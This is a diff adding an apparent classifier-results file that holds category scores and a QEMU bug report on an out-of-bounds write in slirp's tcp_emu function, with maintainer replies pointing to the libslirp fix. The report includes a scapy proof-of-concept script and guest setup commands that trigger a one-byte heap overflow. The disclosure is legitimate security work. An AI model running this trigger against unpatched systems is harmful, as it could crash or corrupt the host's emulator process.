Diffstat (limited to 'results/classifier/108/other/1858415')
-rw-r--r--results/classifier/108/other/1858415110
1 files changed, 110 insertions, 0 deletions
diff --git a/results/classifier/108/other/1858415 b/results/classifier/108/other/1858415
new file mode 100644
index 000000000..4b246fae7
--- /dev/null
+++ b/results/classifier/108/other/1858415
@@ -0,0 +1,110 @@
+other: 0.735
+network: 0.686
+debug: 0.665
+device: 0.654
+socket: 0.653
+graphic: 0.650
+permissions: 0.625
+performance: 0.623
+files: 0.619
+PID: 0.607
+semantic: 0.596
+boot: 0.592
+vnc: 0.580
+KVM: 0.523
+
+in tcp_emu function has OOB bug
+
+qemu version: 4.1.0 
+
+```c
+int tcp_emu(struct socket *so, struct mbuf *m){
+............
+case EMU_REALAUDIO:
+............
+    while (bptr < m->m_data + m->m_len) {
+        case 6:
+............
+            lport = (((uint8_t *)bptr)[0] << 8) + ((uint8_t *)bptr)[1];
+............               
+            *(uint8_t *)bptr++ = (p >> 8) & 0xff;
+            *(uint8_t *)bptr = p & 0xff;
+............
+    }
+............
+............
+}
+```
+
+bptr)[1] and  bptr++ ,may make bptr ==  m->m_data + m->m_len,and cause OOB(out of bounds.)
+
+Thanks for your bug report. For future security critical bugs, please follow the steps described on https://wiki.qemu.org/SecurityProcess instead.
+For this one, I've forwarded the information to the libslirp project, since the "slirp" code has been moved to a separate project which is no longer part of the QEMU project. They've included a fix here:
+https://gitlab.freedesktop.org/slirp/libslirp/commit/2655fffed7a9e765bcb4701dd876e9dab975f289
+
+Thanks
+
+poc:
+```python
+#!/usr/bin/python3
+
+import os
+import time
+from scapy.all import *
+
+target_ip = '10.0.2.2'
+target_port = 7070
+
+def start_tcp(target_ip,target_port,str_to_send):
+    global sport,s_seq,d_seq
+    try:
+        ans = sr1(IP(dst=target_ip)/TCP(dport=target_port,sport=RandShort(),seq=RandInt(),flags=0x2),verbose=False)
+        sport = ans[TCP].dport
+        s_seq = ans[TCP].ack
+        d_seq = ans[TCP].seq+1
+        
+        send(IP(dst=target_ip)/TCP(dport=target_port,sport=sport,ack=d_seq,seq=s_seq,flags=0x10),verbose=False)
+
+        send(IP(dst=target_ip)/TCP(dport=target_port,sport=sport,ack=d_seq,seq=s_seq,flags=0x18)/str_to_send,verbose=False)
+        print(ans[TCP])
+    except Exception as e:
+        print(e)
+
+if __name__ == '__main__':
+    buf = ['R' for n in range(2200)];
+    buf_len = len(buf);
+    
+    buf[buf_len-10]= chr(0x50)
+    buf[buf_len-9] = chr(0x4e)
+    buf[buf_len-8] = chr(0x41)
+    buf[buf_len-7] = chr(0x00)
+    buf[buf_len-1] = chr(27)
+    start_tcp(target_ip,target_port,"".join(buf))
+```
+
+In host OS run:
+
+```shell
+nc -l -p 7070 
+```
+
+In guest OS run:
+
+```shell
+# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 10.0.2.2 -j DROP # Because we will use Python to construct tcp packets, this will prevent the kernel from sending rst packets.
+# ip link set ens3 mtu 3000 # When the sending size is larger than the default mtu packet, the slipr_input function allocates space from the heap, and then we can overflow one byte of the heap space
+# ./poc
+```
+
+This will cause a byte heap overflow.
+
+Excuse me, can I get a CVE number?
+
+If you need a CVE number, please send a mail with the bug description to the people listed on https://wiki.qemu.org/SecurityProcess
+
+thank you very much!
+
+This should be fixed with QEMU v5.0.
+
+libslirp fix included in commit 7769c23774d1, released in QEMU-v5.0.0
+